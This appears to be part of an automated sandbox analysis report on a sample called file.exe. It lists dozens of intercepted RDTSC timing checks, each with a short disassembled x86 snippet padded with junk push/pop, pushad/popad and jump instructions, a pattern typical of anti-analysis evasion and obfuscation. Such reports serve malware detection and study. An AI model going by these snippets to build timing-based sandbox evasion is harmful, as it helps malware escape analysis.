Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12340CA second address: 12340E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F99150F9505h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12385BB second address: 12385BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12385BF second address: 12385C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12385C3 second address: 12385CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A9520 second address: 11A9534 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F99150F94FFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A9534 second address: 11A953D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AE534 second address: 11AE548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99150F9500h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AE548 second address: 11AE576 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AE576 second address: 11AE582 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jp 00007F99150F94F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123B9CB second address: 123B9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123B9CF second address: 123B9E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F99150F9503h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123BBBB second address: 123BBBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123BBBF second address: 123BBD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123BBD2 second address: 123BBD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123BBD8 second address: 123BBEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99150F94FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123BBEA second address: 123BBF8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F99146B4596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123E55E second address: 123E568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123E568 second address: 123E585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99146B45A7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123E0E2 second address: 123E0FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F99150F9503h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123E241 second address: 123E278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F99146B459Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c je 00007F99146B45D0h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F99146B45A7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1244C33 second address: 1244C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12434CA second address: 12434D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F0A10 second address: 11F0A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99150F94FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F0A20 second address: 11F0A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1243E45 second address: 1243E64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F99150F9509h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1243E64 second address: 1243E69 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1244970 second address: 124497A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F99150F94F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124497A second address: 124497F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248BF3 second address: 1248BFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F99150F94F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248BFD second address: 1248C43 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F99146B459Eh 0x0000000c jp 00007F99146B4596h 0x00000012 jmp 00007F99146B45A8h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F99146B459Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1248C43 second address: 1248C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F99150F94F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1247F17 second address: 1247F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F99146B459Ch 0x0000000b jne 00007F99146B4596h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124839B second address: 12483C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F9503h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F99150F94FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12483C7 second address: 12483CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124B9BB second address: 124B9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c jbe 00007F99150F94F6h 0x00000012 pop eax 0x00000013 pushad 0x00000014 jno 00007F99150F94F6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B8643 second address: 11B8647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B8647 second address: 11B867E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99150F9509h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99150F9506h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252628 second address: 125262E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125262E second address: 1252634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252634 second address: 125263D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125263D second address: 1252647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F99150F94F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252BCB second address: 1252BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252F1D second address: 1252F3B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99150F94F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F99150F94FAh 0x00000013 je 00007F99150F94F6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125322E second address: 1253233 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12534C0 second address: 12534E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 jmp 00007F99150F94FFh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F99150F94F6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253799 second address: 12537B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F99146B459Eh 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253A7B second address: 1253A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253A81 second address: 1253A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F99146B459Eh 0x0000000a pop ecx 0x0000000b jc 00007F99146B45BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253DB0 second address: 1253DC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253DC1 second address: 1253DCB instructions: 0x00000000 rdtsc 0x00000002 js 00007F99146B459Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125DA36 second address: 125DA70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F9504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F99150F94FEh 0x00000013 jno 00007F99150F94F6h 0x00000019 popad 0x0000001a jc 00007F99150F94F8h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125DA70 second address: 125DA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125CA74 second address: 125CA8B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99150F94FCh 0x00000008 ja 00007F99150F94F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125CA8B second address: 125CA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125D238 second address: 125D24A instructions: 0x00000000 rdtsc 0x00000002 je 00007F99150F94F6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125D24A second address: 125D24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125D3C1 second address: 125D3C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125D3C5 second address: 125D3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99146B45A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125D757 second address: 125D75D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125D75D second address: 125D763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12615F5 second address: 126160C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F99150F94F6h 0x0000000d jmp 00007F99150F94FAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126160C second address: 1261612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268071 second address: 1268075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12685FF second address: 126861C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A5h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12688B4 second address: 12688B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268E1C second address: 1268E20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268E20 second address: 1268E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268E28 second address: 1268E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F99146B4596h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126956D second address: 1269573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1269573 second address: 126959F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F99146B4596h 0x0000000a popad 0x0000000b push edx 0x0000000c jo 00007F99146B4596h 0x00000012 jmp 00007F99146B45A6h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1269BEA second address: 1269BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F99150F94F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1269BF4 second address: 1269BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126FB27 second address: 126FB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126FB2D second address: 126FB38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126F558 second address: 126F560 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126F560 second address: 126F566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126F81B second address: 126F82B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99150F94F6h 0x00000008 ja 00007F99150F94F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127E44E second address: 127E46C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A9h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128FA15 second address: 128FA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128FA24 second address: 128FA2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12958D8 second address: 12958DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12958DC second address: 12958E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1295EBD second address: 1295EC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1295EC4 second address: 1295EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F99146B45A0h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1295EE0 second address: 1295EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1295EE8 second address: 1295EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1296BBC second address: 1296BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1296BC2 second address: 1296BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1296BC6 second address: 1296BDB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99150F94F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F99150F94F6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1296BDB second address: 1296BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push esi 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129A51C second address: 129A528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129A528 second address: 129A52C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129D652 second address: 129D656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129D52E second address: 129D534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129F934 second address: 129F93A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A38D3 second address: 12A38E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A38E4 second address: 12A38E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B13BE second address: 12B13D9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F99146B45A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B13D9 second address: 12B13F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99150F9503h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BD524 second address: 12BD533 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99146B4596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BD533 second address: 12BD543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEE43 second address: 12BEE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
